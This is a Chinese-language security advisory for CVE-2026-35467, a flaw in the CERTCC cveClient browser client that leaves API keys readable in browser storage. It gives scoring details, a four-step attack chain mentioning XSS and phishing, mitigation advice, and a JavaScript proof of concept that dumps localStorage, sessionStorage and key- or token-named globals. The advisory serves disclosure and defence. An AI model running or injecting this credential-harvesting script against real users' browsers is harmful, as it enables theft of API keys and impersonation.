CVE-2026-35467 CVSS 7.5 高危

CVE-2026-35467 浏览器客户端API密钥泄露漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35467

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CERTCC cveClient

漏洞概述

CERTCC cveClient 浏览器客户端在本地临时存储 API 密钥时，未将其标记为受保护数据。这导致攻击者能够通过 JavaScript 控制台或利用其他错误信息，轻易提取出加密凭证，造成敏感信息泄露。

技术细节

该漏洞的根源在于应用程序对敏感数据的存储处理不当。CERTCC cveClient 在浏览器端将用于加密的 API 密钥存储在临时存储区域（如 LocalStorage、SessionStorage 或内存变量中），且未设置适当的访问控制或加密保护机制。由于这些数据未标记为受保护，它们在页面的 JavaScript 执行上下文中是完全可读的。攻击者无需复杂的攻击手段，只需获得对浏览器的访问权限（例如通过网络钓鱼诱导用户打开恶意页面结合 XSS，或在用户离开终端时直接操作），打开开发者工具的控制台，输入简单的 JavaScript 代码即可遍历存储对象并提取明文凭证。CVSS 3.1 评分为 7.5，反映了其通过网络攻击、无需认证且对机密性造成高影响的特性。

攻击链分析

STEP 1

步骤1：访问目标

攻击者诱导用户访问包含 CERTCC cveClient 的页面，或者获得对用户浏览器的物理/远程访问权限。

STEP 2

步骤2：执行代码

攻击者打开浏览器的开发者工具（DevTools），进入 JavaScript 控制台，或利用页面中存在的 XSS 漏洞注入恶意脚本。

STEP 3

步骤3：提取凭证

通过脚本读取浏览器本地存储（LocalStorage/SessionStorage）或全局变量，获取未受保护的 API 密钥和加密凭证。

STEP 4

步骤4：利用凭证

攻击者使用窃取到的凭证进行后续的非法操作，如解密数据或冒充用户身份。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Proof of Concept: Extracting API keys from browser storage
// Open browser console (F12) and run the following script

// Check LocalStorage
if (localStorage.length > 0) {
    console.log("[+] LocalStorage found:");
    for (let i = 0; i < localStorage.length; i++) {
        let key = localStorage.key(i);
        let value = localStorage.getItem(key);
        console.log(`Key: ${key}, Value: ${value}`);
    }
} else {
    console.log("[-] No LocalStorage data");
}

// Check SessionStorage
if (sessionStorage.length > 0) {
    console.log("[+] SessionStorage found:");
    for (let i = 0; i < sessionStorage.length; i++) {
        let key = sessionStorage.key(i);
        let value = sessionStorage.getItem(key);
        console.log(`Key: ${key}, Value: ${value}`);
    }
} else {
    console.log("[-] No SessionStorage data");
}

// Check for potential keys in global window object
console.log("[+] Scanning window object for potential keys...");
Object.keys(window).forEach(k => {
    if (k.toLowerCase().includes('key') || k.toLowerCase().includes('token') || k.toLowerCase().includes('api')) {
        console.log(`Potential Key found: ${k} = ${window[k]}`);
    }
});

影响范围

CERTCC cveClient (修复前版本)

防御指南

临时缓解措施

在未升级修复前，建议用户不要在不可信的网络环境中使用该客户端。如果怀疑凭证已被泄露，应立即轮换 API 密钥。使用后务必清除浏览器缓存和 Cookie。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-35467
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-35467
3 Details https://www.cvedetails.com/cve/CVE-2026-35467/
4 VulDB https://vuldb.com/cve/CVE-2026-35467
5 Link https://github.com/CERTCC/cveClient/
6 Link https://github.com/CERTCC/cveClient/pull/39

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表